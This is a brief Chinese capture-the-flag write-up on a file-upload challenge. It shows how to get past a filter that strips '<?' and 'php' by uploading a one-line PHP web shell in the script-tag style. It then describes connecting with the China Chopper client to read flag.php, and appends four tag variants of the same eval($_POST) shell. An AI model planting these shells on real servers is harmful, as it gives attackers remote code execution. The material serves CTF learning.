首先,打开是一个上传界面
,说是可以随意上传,那就传一个一句话木马,
,上传之后点击上传成功后看到这样一个界面
会发现php,<?没了,猜测被过滤,所以我们换一种php风格,然后php对于大小写敏感,可以将php大写然后上传
1 <script language="PHP"> 2 @eval($_POST[‘value‘]) 3 </script>
然后进行菜刀链接,往上一个目录将会发现flag.php,就行了
附php的四种风格:
<?php eval($_POST[‘cmd‘]); ?>
<script language="php">
eval($_POST[‘cmd‘]);
</script>
<?
eval($_POST[‘cmd‘]);
?>
<%
eval($_POST[‘cmd‘]);
%>
参考:PHP四种标记风格 楼兰0x23 https://blog.csdn.net/qq_35085863/article/details/76714367
原文:https://www.cnblogs.com/zs0618/p/13215772.html